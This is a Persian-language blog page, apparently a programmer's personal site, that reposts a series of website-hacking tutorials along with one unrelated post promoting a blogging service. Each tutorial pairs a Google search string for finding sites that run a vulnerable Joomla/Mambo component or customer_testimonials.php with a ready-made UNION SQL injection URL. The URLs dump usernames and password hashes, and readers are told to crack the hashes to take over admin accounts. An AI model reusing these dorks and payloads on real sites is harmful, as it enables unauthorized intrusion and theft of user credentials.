سیستم وبلاگ پارسی باکسسیستم مدیریت فروش هاست و دامینسایت شخصی محسن داوری برنامه نویس PHPهماهنگی با موتورهای جستجو , رنکینگ گوگل , google pagerank , page rank , seo , search

امروز براتون به آموزش جالب از سری آموزش های هک سایت به وسیله باگ های منتشر شده رو براتون گذاشتم!

این آموزش از این قرار است که شما می توانید از طریق آسیپ پذیری موجو در سایت های که دارای  مدیریت محتوای ( PU Arcade Remote SQL Injection ) هستند به هک آنها بپردازید!

خوب شما برای هک این سایت ها ابتدا عبارت زیر را در گوگل جستجو کنید:

index.php?option=com_puarcade

حال پس ار یافتن سایت های مورد نظر فقط کافی است که عبارت زیر را به ادامه نام سایت اضافه کنید:

index.php?option=com_puarcade&Itemid=92&fid=-1%20union%20select%20concat(username,0x3a,password)%20from%20jos_users--

حال مشاهده خواهید کرد که پسورد  Admin سایت را یه صورت Encode شده در اختیار شما قرار داده می شود و شما می توانید به وسیله یک برنامه Encode پسورد اصلی سایت را به دست آورید!

منبع:پسورد35

امروز می خوام تو این پست یک سایت ارائه دهنده خدمات وبلاگ رو براتون معرفی کنم که دارای امکانات بسیار جالب می باشد که این سایت را در نوع حود منحصر به فر نموده است!
این سایت یک سایت خارجی ارائه دهنده خدمات وبلاگ همانند کلیه سایت های ارائه دهنده این قابلیت در داخل کشور است اما این سایت برخی خدمات را به کاربران خود ارائه نموده است که برای هر یک از شما دوستان عزیر که دارای یک وبلاگ شخصی هستین لازم می باشد که این سایت همگی آنها را در سیستم خدمات رسانی خود جهت استفاده کاربران خود گنجانده است!

برخی از قایلیت های این سایت منحصر به فر شامل:

۱- امکان آپلود فایل جهت قرار دادن در وبلاگ شخصی خود

۲- امکان اختصاص ایمیل شخصی با همان نام کاربری

۳- امکان ارسال و دریافت ایمیل

۴- پشتیبانی از FTP

۵- امکان آپلود فایل های تصویری و صوتی جهت قرار دادن در ویلاگ شخصی خود

۶- اختصاص لینک دانلود مستقیم به فایل های آپلود شده

۷- امکان کپی کامل یک سایت و قرار دادن در هاست شخصی خود

۸- اختصاص دامنه رایگان

۹- امکان اتصال آسان دامنه به وبلاگ خود

و.................

www.xm.com

نقل قول از Password35

امروز براتون به آموزش جالب از سری آموزش های هک سایت به وسیله باگ های منتشر شده رو براتون گذاشتم!

این آموزش از این قرار است که شما می توانید از طریق آسیپ پذیری موجو در سایت های که دارای مدیریت محتوای ( com_glossary) هستند به هک یوزر و پسورد اعضای این قبیل سایت ها بپردازید!

خوب شما برای هک این سایت ها ابتدا عبارت زیر را در گوگل جستجو کنید:

com_glossary

حال پس ار یافتن سایت های مورد نظر فقط کافی است که عبارت زیر را به ادامه نام سایت اضافه کنید:

index.php?option=com_glossary&func=display&Itemid=s@bun&catid=-1%20union%20select%201,username,password,4,5,6,7,8,9,10,11,12,13,14%20from%20mos_users--

حال مشاهده خواهید کرد که پسورد اعضای سایت را به صورت Encode شده در اختیار شما قرار داده می شود و شما می توانید به وسیله یک برنامه Encode پسورد اصلی را به دست آورید!

امروز براتون به آموزش جالب از سری آموزش های هک سایت به وسیله باگ های منتشر شده رو براتون گذاشتم!

این آموزش از این قرار است که شما می توانید از طریق آسیپ پذیری موجو در سایت های که دارای مدیریت محتوای (com_downloads) هستند به هک یوزر و پسورد این قبیل سایت ها بپردازید!

خوب شما برای هک این سایت ها ابتدا عبارت زیر را در گوگل جستجو کنید:

"com_downloads"filecatid

حال پس ار یافتن سایت های مورد نظر فقط کافی است که عبارت زیر را به ادامه نام سایت اضافه کنید:

index.php?option=com_downloads&Itemid=S@BUN&func=selectfolder&filecatid=-1/**/union/**/select/**/concat(username,0x3a,password),concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*

حال مشاهده خواهید کرد که پسورد سایت را به صورت Encode شده در اختیار شما قرار داده می شود و شما می توانید به وسیله یک برنامه Encode پسورد اصلی را به دست آورید!

امروز براتون به آموزش جالب از سری آموزش های هک سایت به وسیله باگ های منتشر شده رو  گذاشتم!

این آموزش از این قرار است که شما می توانید از طریق آسیپ پذیری موجو در سایت های که دارای مدیریت محتوای (customer_testimonials) هستند به هک یوزر و پسورد کاربران این قبیل سایت ها بپردازید!

خوب شما برای هک این سایت ها ابتدا عبارت زیر را در گوگل جستجو کنید:

customer_testimonials.php

حال پس ار یافتن سایت های مورد نظر فقط کافی است که عبارت زیر را به ادامه نام سایت اضافه کنید:

customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat
(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),
4,5,6,7,8+from+customers/*

حال مشاهده خواهید کرد که پسورد های کاربران سایت را به صورت Encode شده در اختیار شما قرار داده می شود و شما می توانید به وسیله یک برنامه Encode پسورد اصلی را به دست آورید!

نقل قول از پسورد 35

امروز براتون به آموزش جالب از سری آموزش های هک سایت به وسیله باگ های منتشر شده رو  گذاشتم!

این آموزش از این قرار است که شما می توانید از طریق آسیپ پذیری موجو در سایت های که دارای مدیریت محتوای (com_comments) هستند به هک یوزر و پسورد کاربران این قبیل سایت ها بپردازید!

خوب شما برای هک این سایت ها ابتدا عبارت زیر را در گوگل جستجو کنید:

"Review Script", "Phil Taylor"

حال پس ار یافتن سایت های مورد نظر فقط کافی است که عبارت زیر را به ادامه نام سایت اضافه کنید:

index.php?option=com_comments&task=view&id=
-1+UNION+SELECT+0,999999,concat(username,0x3a,PASSWORD)
,0,0,0,0,0,0+FROM+mos_users+union+select+*+from+mos_content_
comments+where+1=1

حال مشاهده خواهید کرد که پسورد های کاربران سایت را به صورت Encode شده در اختیار شما قرار داده می شود و شما می توانید به وسیله یک برنامه Encode پسورد های اصلی را به دست آورید!

به نقل از پسورد 35

امروز براتون به آموزش جالب از سری آموزش های هک سایت به وسیله باگ های منتشر شده رو  گذاشتم!

این آموزش از این قرار است که شما می توانید از طریق آسیپ پذیری موجو در سایت های که دارای مدیریت محتوای (com_galeria) هستند به هک پسورد ادمین این قبیل سایت ها بپردازید!

خوب شما برای هک این سایت ها ابتدا عبارت زیر را در گوگل جستجو کنید:

com_galeria

حال پس ار یافتن سایت های مورد نظر فقط کافی است که عبارت زیر را به ادامه نام سایت اضافه کنید:

index.php?option=com_galeria&Itemid=S@BUN&func=detail&id
=-999999/**/union/**/select/**/0,0,password,111,222,333,0,0,0,0,0
,1,1,1,1,1,1,444,555,666,username/**/from/**/users/*

حال مشاهده خواهید کرد که پسورد های ادمین سایت را به صورت Encode شده در اختیار شما قرار داده می شود و شما می توانید به وسیله یک برنامه Encode پسورد های اصلی را به دست آورید!

منبع:Password35